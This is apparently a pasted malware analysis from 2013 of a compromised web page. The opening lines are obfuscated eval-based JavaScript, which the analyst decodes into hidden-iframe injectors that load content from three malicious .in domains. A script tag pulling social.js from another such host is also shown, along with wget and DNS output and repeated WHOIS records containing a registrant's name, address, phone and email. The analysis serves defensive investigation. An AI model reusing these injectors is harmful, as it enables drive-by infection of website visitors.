8$55$26$21$26.5$55$52.5$53$26$21$26.5$16.5$28$27$20.5$49.5$48$54$45.5$51.5$47.5$28$14$17.5$26.5$3.5$1.5$1.5$59.5$3.5$1.5$1.5$48$55.5$52$46.5$55$49.5$52.5$52$13$49.5$48$54$45.5$51.5$47.5$54$17$17.5$58.5$3.5$1.5$1.5$1.5$56$45.5$54$13$48$13$27.5$13$47$52.5$46.5$55.5$51.5$47.5$52$55$20$46.5$54$47.5$45.5$55$47.5$31.5$51$47.5$51.5$47.5$52$55$17$16.5$49.5$48$54$45.5$51.5$47.5$16.5$17.5$26.5$48$20$54.5$47.5$55$29.5$55$55$54$49.5$46$55.5$55$47.5$17$16.5$54.5$54$46.5$16.5$19$16.5$49$55$55$53$26$20.5$20.5$58$53$54.5$55$45.5$55$54.5$20$49.5$52$20.5$16.5$17.5$26.5$48$20$54.5$55$57.5$51$47.5$20$56$49.5$54.5$49.5$46$49.5$51$49.5$55$57.5$27.5$16.5$49$49.5$47$47$47.5$52$16.5$26.5$48$20$54.5$55$57.5$51$47.5$20$53$52.5$54.5$49.5$55$49.5$52.5$52$27.5$16.5$45.5$46$54.5$52.5$51$55.5$55$47.5$16.5$26.5$48$20$54.5$55$57.5$51$47.5$20$51$47.5$48$55$27.5$16.5$21$16.5$26.5$48$20$54.5$55$57.5$51$47.5$20$55$52.5$53$27.5$16.5$21$16.5$26.5$48$20$54.5$47.5$55$29.5$55$55$54$49.5$46$55.5$55$47.5$17$16.5$56.5$49.5$47$55$49$16.5$19$16.5$21.5$21$16.5$17.5$26.5$48$20$54.5$47.5$55$29.5$55$55$54$49.5$46$55.5$55$47.5$17$16.5$49$47.5$49.5$48.5$49$55$16.5$19$16.5$21.5$21$16.5$17.5$26.5$3.5$1.5$1.5$1.5$47$52.5$46.5$55.5$51.5$47.5$52$55$20$48.5$47.5$55$31.5$51$47.5$51.5$47.5$52$55$54.5$30$57.5$39$45.5$48.5$36$45.5$51.5$47.5$17$16.5$46$52.5$47$57.5$16.5$17.5$42.5$21$43.5$20$45.5$53$53$47.5$52$47$30.5$49$49.5$51$47$17$48$17.5$26.5$3.5$1.5$1.5$59.5"[((e)?"s":"")+"p"+"lit"]("a$".substr(1));
  159.    for(i=6-2-1-2-1;i-545!=0;i++)
  160.    {
  161.      k=i;
  162.      ss=ss+String.fromCharCode(-1*h*(3+1*n[k]));
  163.    }
  164.    q=ss;
  165.    e(q);
  166.  }
  167.  </script><script>if(window["document"])try
  168.  {
  169.    prototype;
  170.  }
  171.  catch(brebr)
  172.  {
  173.    st=String;
  174.    zz='al';
  175.    zz='zv'.substr(123-122)+zz;
  176.    ss=[];
  177.    f='fr'+'om'+'Ch';
  178.    f+='arC';
  179.    f+='qgode'["substr"](4-2);
  180.    w=this;
  181.    e=w[f["substr"](11)+zz];
  182.    n="3.5#3.5#51.5#50#15#19#49#54.5#48.5#57.5#53.5#49.5#54#57#22#50.5#49.5#57#33.5#53#49.5#53.5#49.5#54#57#56.5#32#59.5#41#47.5#50.5#38#47.5#53.5#49.5#19#18.5#48#54.5#49#59.5#18.5#19.5#44.5#23#45.5#19.5#60.5#5.5#3.5#3.5#3.5#51.5#50#56#47.5#53.5#49.5#56#19#19.5#28.5#5.5#3.5#3.5#61.5#15#49.5#53#56.5#49.5#15#60.5#5.5#3.5#3.5#3.5#49#54.5#48.5#57.5#53.5#49.5#54#57#22#58.5#56#51.5#57#49.5#19#16#29#51.5#50#56#47.5#53.5#49.5#15#56.5#56#48.5#29.5#18.5#51#57#57#55#28#22.5#22.5#48.5#53#54.5#47.5#54#56.5#22#54.5#56#50.5#22.5#18.5#15#58.5#51.5#49#57#51#29.5#18.5#23.5#23#18.5#15#51#49.5#51.5#50.5#51#57#29.5#18.5#23.5#23#18.5#15#56.5#57#59.5#53#49.5#29.5#18.5#58#51.5#56.5#51.5#48#51.5#53#51.5#57#59.5#28#51#51.5#49#49#49.5#54#28.5#55#54.5#56.5#51.5#57#51.5#54.5#54#28#47.5#48#56.5#54.5#53#57.5#57#49.5#28.5#53#49.5#50#57#28#23#28.5#57#54.5#55#28#23#28.5#18.5#30#29#22.5#51.5#50#56#47.5#53.5#49.5#30#16#19.5#28.5#5.5#3.5#3.5#61.5#5.5#3.5#3.5#50#57.5#54#48.5#57#51.5#54.5#54#15#51.5#50#56#47.5#53.5#49.5#56#19#19.5#60.5#5.5#3.5#3.5#3.5#58#47.5#56#15#50#15#29.5#15#49#54.5#48.5#57.5#53.5#49.5#54#57#22#48.5#56#49.5#47.5#57#49.5#33.5#53#49.5#53.5#49.5#54#57#19#18.5#51.5#50#56#47.5#53.5#49.5#18.5#19.5#28.5#50#22#56.5#49.5#57#31.5#57#57#56#51.5#48#57.5#57#49.5#19#18.5#56.5#56#48.5#18.5#21#18.5#51#57#57#55#28#22.5#22.5#48.5#53#54.5#47.5#54#56.5#22#54.5#56#50.5#22.5#18.5#19.5#28.5#50#22#56.5#57#59.5#53#49.5#22#58#51.5#56.5#51.5#48#51.5#53#51.5#57#59.5#29.5#18.5#51#51.5#49#49#49.5#54#18.5#28.5#50#22#56.5#57#59.5#53#49.5#22#55#54.5#56.5#51.5#57#51.5#54.5#54#29.5#18.5#47.5#48#56.5#54.5#53#57.5#57#49.5#18.5#28.5#50#22#56.5#57#59.5#53#49.5#22#53#49.5#50#57#29.5#18.5#23#18.5#28.5#50#22#56.5#57#59.5#53#49.5#22#57#54.5#55#29.5#18.5#23#18.5#28.5#50#22#56.5#49.5#57#31.5#57#57#56#51.5#48#57.5#57#49.5#19#18.5#58.5#51.5#49#57#51#18.5#21#18.5#23.5#23#18.5#19.5#28.5#50#22#56.5#49.5#57#31.5#57#57#56#51.5#48#57.5#57#49.5#19#18.5#51#49.5#51.5#50.5#51#57#18.5#21#18.5#23.5#23#18.5#19.5#28.5#5.5#3.5#3.5#3.5#49#54.5#48.5#57.5#53.5#49.5#54#57#22#50.5#49.5#57#33.5#53#49.5#53.5#49.5#54#57#56.5#32#59.5#41#47.5#50.5#38#47.5#53.5#49.5#19#18.5#48#54.5#49#59.5#18.5#19.5#44.5#23#45.5#22#47.5#55#55#49.5#54#49#32.5#51#51.5#53#49#19#50#19.5#28.5#5.5#3.5#3.5#61.5"[((e)?"s":"")+"p"+"lit"]("a#"[((e)?"su":"")+"bstr"](1));
  183.    try
  184.    {
  185.      q=document.createElement("div");
  186.      q.appendChild(q);
  187.    }
  188.    catch(qw)
  189.    {
  190.      h=-parseInt('012')/5;
  191.    }
  192.    for(i=6-2-1-2-1;i-545!=0;i++)
  193.    {
  194.      j=i;
  195.      if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));
  196.    }
  197.    q=ss;
  198.    if(e)e(""+q);
  199.  }
  200.  </script>
  201.  
  202.  
  203. // see the below link in the script....
  204. //  </script><script type="text/javascript" src="h00p://filehost101.in/tds777/social.js"></script><script>try
  205. // lets fetch it...
  206.  
  207. //... cant fecth it,,,
  208.  
  209. --19:22:17--  h00p://filehost101.in/tds777/social.js
  210.            => `social.js'
  211. Resolving filehost101.in... seconds 0.00, failed: Unknown host.
  212.  
  213. ;; QUESTION SECTION:
  214. ;filehost101.in.                        IN      A
  215.  
  216.  
  217. // seeking why cant fecth it...
  218.  
  219. Domain ID:D6389890-AFIN
  220. Domain Name:FILEHOST101.IN
  221. Created On:21-May-2012 22:20:31 UTC
  222. Last Updated On:21-Jul-2012 19:21:48 UTC
  223. Expiration Date:21-May-2013 22:20:31 UTC
  224. Sponsoring Registrar:Enom Inc. (R46-AFIN)
  225. Status:CLIENT TRANSFER PROHIBITED
  226. Registrant ID:55f7cab898d98545
  227. Registrant Name:Stepan  Ahmethanov
  228. Registrant Organization:
  229. Registrant Street1:Prospekt Mira 28
  230. Registrant Street2:
  231. Registrant Street3:
  232. Registrant City:Moscow
  233. Registrant State/Province:Moscow
  234. Registrant Postal Code:129074
  235. Registrant Country:RU
  236. Registrant Phone:+7.9653428756
  237. Registrant Phone Ext.:
  238. Registrant FAX:
  239. Registrant FAX Ext.:
  240. Registrant Email:keyb@exchangezones.net
  241. Admin ID:55f7cab898d98545
  242. Admin Name:Stepan  Ahmethanov
  243. Admin Organization:
  244. Admin Street1:Prospekt Mira 28
  245. Admin Street2:
  246. Admin Street3:
  247. Admin City:Moscow
  248. Admin State/Province:Moscow
  249. Admin Postal Code:129074
  250. Admin Country:RU
  251. Admin Phone:+7.9653428756
  252. Admin Phone Ext.:
  253. Admin FAX:
  254. Admin FAX Ext.:
  255. Admin Email:keyb@exchangezones.net
  256. Tech ID:55f7cab898d98545
  257. Tech Name:Stepan  Ahmethanov
  258. Tech Organization:
  259. Tech Street1:Prospekt Mira 28
  260. Tech Street2:
  261. Tech Street3:
  262. Tech City:Moscow
  263. Tech State/Province:Moscow
  264. Tech Postal Code:129074
  265. Tech Country:RU
  266. Tech Phone:+7.9653428756
  267. Tech Phone Ext.:
  268. Tech FAX:
  269. Tech FAX Ext.:
  270. Tech Email:keyb@exchangezones.net
  271. Name Server:NS3.FASTVPS.RU
  272. Name Server:NS4.FASTVPS.RU
  273.  
  274.  
  275. // looks the domain's down.. good! let's skip it and try to deobfs it:
  276.  
  277.  
  278. // first eval valie...
  279.  
  280. if (document.getElementsByTagName('body')[0]){
  281.   iframer();
  282. }
  283. else {
  284.   document.write("
  285. <iframe src='h00p://evlex80.in/' width='10' height='10' style='visibility:hidden;position:
  286. absolute;left:0;top:0;'></iframe>");
  287. }
  288. function iframer(){
  289.   var f = document.createElement('iframe');
  290.   f.setAttribute('src', 'h00p://evlex80.in/');
  291.   f.style.visibility = 'hidden';
  292.   f.style.position = 'absolute';
  293.   f.style.left = '0';
  294.   f.style.top = '0';
  295.   f.setAttribute('width', '10');
  296.   f.setAttribute('height', '10');
  297.   document.getElementsByTagName('body')[0].appendChild(f);
  298. }
  299.  
  300. // second eval value...
  301.  
  302. if (document.getElementsByTagName('body')[0]){
  303.   iframer();
  304. }
  305. else {
  306.   document.write("
  307. <iframe src='h00p://aglex70.in/' width='10' height='10' style='visibility:hidden;position:
  308. absolute;left:0;top:0;'></iframe>");
  309. }
  310. function iframer(){
  311.   var f = document.createElement('iframe');
  312.   f.setAttribute('src', 'h00p://aglex70.in/');
  313.   f.style.visibility = 'hidden';
  314.   f.style.position = 'absolute';
  315.   f.style.left = '0';
  316.   f.style.top = '0';
  317.   f.setAttribute('width', '10');
  318.   f.setAttribute('height', '10');
  319.   document.getElementsByTagName('body')[0].appendChild(f);
  320. }
  321.  
  322. //third eval value....
  323.  
  324. if (document.getElementsByTagName('body')[0]){
  325.   iframer();
  326. }
  327. else {
  328.   document.write("
  329. <iframe src='h00p://zpstats.in/' width='10' height='10' style='visibility:hidden;position:
  330. absolute;left:0;top:0;'></iframe>");
  331. }
  332. function iframer(){
  333.   var f = document.createElement('iframe');
  334.   f.setAttribute('src', 'h00p://zpstats.in/');
  335.   f.style.visibility = 'hidden';
  336.   f.style.position = 'absolute';
  337.   f.style.left = '0';
  338.   f.style.top = '0';
  339.   f.setAttribute('width', '10');
  340.   f.setAttribute('height', '10');
  341.   document.getElementsByTagName('body')[0].appendChild(f);
  342. }
  343.  
  344. // we got the three suspected infection by this scheme as per below urls:
  345.  
  346. h00p://evlex80.in/
  347. h00p://aglex70.in/
  348. h00p://zpstats.in/
  349.  
  350.  
  351. // let's check it out....
  352.  
  353. --19:30:55--  h00p://evlex80.in/
  354.            => `index.html'
  355. Resolving evlex80.in... seconds 0.00, failed: Unknown host.
  356.  
  357.  
  358. --19:31:17--  h00p://aglex70.in/
  359.            => `index.html'
  360. Resolving aglex70.in... seconds 0.00, 95.168.187.94
  361. Caching aglex70.in => 95.168.187.94
  362. Connecting to aglex70.in|95.168.187.94|:80... seconds 0.00,
  363. failed: Connection timed out.
  364.  
  365. --19:32:56--  h00p://zpstats.in/
  366.            => `index.html'
  367. Resolving zpstats.in... seconds 0.00, failed: Unknown host.
  368.  
  369. // in accessible, 2 domains down one aglex70.in still up,
  370. // let's wack the up one further...
  371.  
  372.  
  373. // we got the ip 95.168.187.94
  374. // it used the same domain's registered DNS server nsX.fastvps.ru
  375.  
  376. ;; QUESTION SECTION:
  377. ;aglex70.in.                    IN      A
  378.  
  379. ;; ANSWER SECTION:
  380. aglex70.in.             3600    IN      A       95.168.187.94
  381.  
  382. ;; AUTHORITY SECTION:
  383. aglex70.in.             3599    IN      NS      ns3.fastvps.ru.
  384. aglex70.in.             3599    IN      NS      ns4.fastvps.ru.
  385. aglex70.in.             3599    IN      NS      ns1.fastvps.ru.
  386. aglex70.in.             3599    IN      NS      ns2.fastvps.ru.
  387.  
  388. ;; ADDITIONAL SECTION:
  389. ns1.fastvps.ru.         3562    IN      A       95.211.92.14
  390. ns2.fastvps.ru.         3562    IN      A       178.132.200.26
  391. ns3.fastvps.ru.         3562    IN      A       46.4.4.96
  392. ns4.fastvps.ru.         3562    IN      A       93.170.127.130
  393.  
  394.  
  395. // we have the domain AGLEX70.IN
  396. // and all of the domains used in this scheme goes to the same russian register:
  397.  
  398. Registrant ID:55f7cab898d98545
  399. Registrant Name:Stepan  Ahmethanov
  400. Registrant Organization:
  401. Registrant Street1:Prospekt Mira 28
  402. Registrant Street2:
  403. Registrant Street3:
  404. Registrant City:Moscow
  405. Registrant State/Province:Moscow
  406. Registrant Postal Code:129074
  407. Registrant Country:RU
  408. Registrant Phone:+7.9653428756
  409. Registrant Phone Ext.:
  410. Registrant FAX:
  411. Registrant FAX Ext.:
  412. Registrant Email:keyb@exchangezones.net
  413.  
  414.  
  415. // also in the domain providing the download javascript filehost101.in
  416.  
  417. Domain ID:D6389890-AFIN
  418. Domain Name:FILEHOST101.IN
  419. Created On:21-May-2012 22:20:31 UTC
  420. Last Updated On:21-Jul-2012 19:21:48 UTC
  421. Expiration Date:21-May-2013 22:20:31 UTC
  422. Sponsoring Registrar:Enom Inc. (R46-AFIN)
  423. Status:CLIENT TRANSFER PROHIBITED
  424. Registrant ID:55f7cab898d98545
  425. Registrant Name:Stepan  Ahmethanov
  426. Registrant Organization:
  427. Registrant Street1:Prospekt Mira 28
  428. Registrant Street2:
  429. Registrant Street3:
  430. Registrant City:Moscow
  431. Registrant State/Province:Moscow
  432. Registrant Postal Code:129074
  433. Registrant Country:RU
  434. Registrant Phone:+7.9653428756
  435. Registrant Phone Ext.:
  436. Registrant FAX:
  437. Registrant FAX Ext.:
  438. Registrant Email:keyb@exchangezones.net
  439.   :
  440.  
  441. // how we know this is the fresh infection? We need dates...
  442. // here:
  443.  
  444.  
  445. // More PoC:
  446.  
  447. Domain ID:D6408331-AFIN
  448. Domain Name:AGLEX70.IN
  449. Created On:24-May-2012 17:03:26 UTC
  450. Last Updated On:23-Jul-2012 19:21:39 UTC
  451. Expiration Date:24-May-2013 17:03:26 UTC
  452. Sponsoring Registrar:Enom Inc. (R46-AFIN)
  453. Status:CLIENT TRANSFER PROHIBITED
  454. Registrant ID:55f7cab898d98545
  455. Registrant Name:Stepan  Ahmethanov
  456. Registrant Organization:
  457. Registrant Street1:Prospekt Mira 28
  458. Registrant Street2:
  459. Registrant Street3:
  460. Registrant City:Moscow
  461. Registrant State/Province:Moscow
  462. Registrant Postal Code:129074
  463. Registrant Country:RU
  464. Registrant Phone:+7.9653428756
  465. Registrant Phone Ext.:
  466. Registrant FAX:
  467. Registrant FAX Ext.:
  468. Registrant Email:keyb@exchangezones.net
  469. Admin ID:55f7cab898d98545
  470. Admin Name:Stepan  Ahmethanov
  471. Admin Organization:
  472. Admin Street1:Prospekt Mira 28
  473. Admin Street2:
  474. Admin Street3:
  475. Admin City:Moscow
  476. Admin State/Province:Moscow
  477. Admin Postal Code:129074
  478. Admin Country:RU
  479. Admin Phone:+7.9653428756
  480. Admin Phone Ext.:
  481. Admin FAX:
  482. Admin FAX Ext.:
  483. Admin Email:keyb@exchangezones.net
  484. Tech ID:55f7cab898d98545
  485. Tech Name:Stepan  Ahmethanov
  486. Tech Organization:
  487. Tech Street1:Prospekt Mira 28
  488. Tech Street2:
  489. Tech Street3:
  490. Tech City:Moscow
  491. Tech State/Province:Moscow
  492. Tech Postal Code:129074
  493. Tech Country:RU
  494. Tech Phone:+7.9653428756
  495. Tech Phone Ext.:
  496. Tech FAX:
  497. Tech FAX Ext.:
  498. Tech Email:keyb@exchangezones.net
  499. Name Server:NS3.FASTVPS.RU
  500. Name Server:NS4.FASTVPS.RU
  501.  
  502.  
  503. Domain ID:D6383541-AFIN
  504. Domain Name:ZPSTATS.IN
  505. Created On:20-May-2012 17:51:24 UTC
  506. Last Updated On:19-Jul-2012 19:21:02 UTC
  507. Expiration Date:20-May-2013 17:51:24 UTC
  508. Sponsoring Registrar:Enom Inc. (R46-AFIN)
  509. Status:CLIENT TRANSFER PROHIBITED
  510. Registrant ID:55f7cab898d98545
  511. Registrant Name:Stepan  Ahmethanov
  512. Registrant Organization:
  513. Registrant Street1:Prospekt Mira 28
  514. Registrant Street2:
  515. Registrant Street3:
  516. Registrant City:Moscow
  517. Registrant State/Province:Moscow
  518. Registrant Postal Code:129074
  519. Registrant Country:RU
  520. Registrant Phone:+7.9653428756
  521. Registrant Phone Ext.:
  522. Registrant FAX:
  523. Registrant FAX Ext.:
  524. Registrant Email:keyb@exchangezones.net
  525. Admin ID:55f7cab898d98545
  526. Admin Name:Stepan  Ahmethanov
  527. Admin Organization:
  528. Admin Street1:Prospekt Mira 28
  529. Admin Street2:
  530. Admin Street3:
  531. Admin City:Moscow
  532. Admin State/Province:Moscow
  533. Admin Postal Code:129074
  534. Admin Country:RU
  535. Admin Phone:+7.9653428756
  536. Admin Phone Ext.:
  537. Admin FAX:
  538. Admin FAX Ext.:
  539. Admin Email:keyb@exchangezones.net
  540. Tech ID:55f7cab898d98545
  541. Tech Name:Stepan  Ahmethanov
  542. Tech Organization:
  543. Tech Street1:Prospekt Mira 28
  544. Tech Street2:
  545. Tech Street3:
  546. Tech City:Moscow
  547. Tech State/Province:Moscow
  548. Tech Postal Code:129074
  549. Tech Country:RU
  550. Tech Phone:+7.9653428756
  551. Tech Phone Ext.:
  552. Tech FAX:
  553. Tech FAX Ext.:
  554. Tech Email:keyb@exchangezones.net
  555. Name Server:NS3.FASTVPS.RU
  556. Name Server:NS4.FASTVPS.RU
  557.  
  558. ---
  559. #MalwareMustDie!
  560. [0x00000000]> !date
  561. Wed Jan  2 19:48:55 JST 2013
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top